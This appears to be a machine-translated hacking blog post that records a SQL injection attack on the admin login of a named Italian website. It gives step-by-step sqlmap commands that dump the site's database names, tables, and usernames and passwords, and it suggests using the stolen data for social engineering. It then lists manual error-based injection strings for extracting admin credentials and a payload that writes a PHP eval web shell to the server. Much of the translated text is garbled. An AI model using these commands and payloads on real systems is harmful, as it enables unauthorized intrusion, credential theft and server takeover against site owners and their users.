POST injection record in Italian website background

Information Detection:

Target Site: http://www.sixxf.it
Server IP Address: 192.232.2xx.97 (USA)
Environment platform: PHP
Server System: Apache
This time, I used a webpage to detect that the information on this site is not complete. Go to the topic, open the website background, and enter a 'in the login account text. The returned result is as follows:

After the execution of ', the SQL statement reports an error, indicating that there may be injection. Use the Sqlmap tool in the Back Track system to test it.
Tip: when looking for injection points on the home page, although an error is reported, Mod_Security is displayed. you should understand that it is a visual Linux system ~ _~
Open the Burp Suite tool to capture the POST data on the submitted page. You can also use the Live HTTP Replay plug-in Firefox to capture the POST data, for example:

The next step is to use the Sqlmap tool in the Back Track system for injection testing. First, save the data obtained by the Burp Suite as txt and put it in Sqlmap.
Root directory, and then execute the following command:

root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -p username--dbsroot@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt --dbs

-P # specify the testable parameters (? Page = 1 & id = 2-p "page, id"). When the-p parameter is used, only one database is exported for 1st times and all databases are exported for 2nd times. Test the function on your own!

The database has come out. We continue to run the table name of the sinpf_sinpf database:

root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf --tables

The database and table have all come out. We will continue to run the column name (field name) of the user table of the sinpf_sinpf database ):

root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user --columns

The database, table name, and column name have all come out. We finally run the username and userpassword columns (fields) in the user table of the sinpf_sinpf database:

root@devil:/pentest/database/sqlmap# ./sqlmap.py -r x.txt -D sinpf_sinpf -T user -C username,userpassword --dump

Well, it's all over here. It's mainly about recording how to use Sqlmap for POST injection in the website background, so no further tests are conducted!

Thought expansion: after reading this domain name and database name, does it feel a little similar? Yes, they all use the same domain name. They can use social engineering to enter the background, and they can
Domain Name, account, password, or some sensitive information can be combined with social engineering personnel. If you perform the next step, I believe this information is still useful! Pai_^

PHP background login box manual injection statement

'And (select 1 from (select count (*), concat (select concat (correlation function 1, 0x20, correlation function 2, 0x20 ,......) from information_schema.tables limit 0, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and '1. burst table name 'and (select 1 from (select count (*), concat (select concat (table_name) from information_schema.tables where table_schema = database () limit 0, 1 ), floor (rand (0) * 2) x from information_schema.tables group X) a) and ''and (select 1 from (select count (*), concat (select concat (table_name) from information_schema.tables where table_schema = database () limit 1, 1 ), floor (rand (0) * 2) x from information_schema.tables group by x) a) and ''and (select 1 from (select count (*), concat (select concat (table_name) from information_schema.tables where table_schema = database () limit 2, 1), floor (rand (0) * 2) x from information_schema. Tables group by x) a) and '2. names of columns 'and (select 1 from (select count (*), concat (select concat (column_name) from information_schema.columns where table_name = Hex limit 0, 1 ), floor (rand (0) * 2) x from information_schema.tables group by x) a) and ''and (select 1 from (select count (*), concat (select concat (column_name) from information_schema.columns where table_name = Hex limit), floor (rand (0) * 2) x from inform Ation_schema.tables group by x) a) and ''and (select 1 from (select count (*), concat (select concat (column_name) from information_schema.columns where table_name = Hex limit 2, 1), floor (rand (0) * 2) x from information_schema.tables group by x) and '3. blow user and password 'and (select 1 from (select count (*), concat (select concat (username, 0x20, password) from admin limit 0, 1 ), floor (rand (0) * 2) x from information_schema.table S group by x) a) and ''and (select 1 from (select count (*), concat (select concat (username, 0x20, password) from admin limit 1, 1), floor (rand (0) * 2) x from information_schema.tables group by x) a) and ''and (select 1 from (select count (*), concat (select concat (username, 0x20, password) from admin limit 2, 1), floor (rand (0) * 2) x from information_schema.tables group by x)) and '4. export Webshell 'or 1 AND (SELECT id FROM _ Users limit 1 into outfile 'd:/sub/jw/safe1.php 'Lines terminated by' <! --? Php eval ($ _ POST [safe])? --> ')#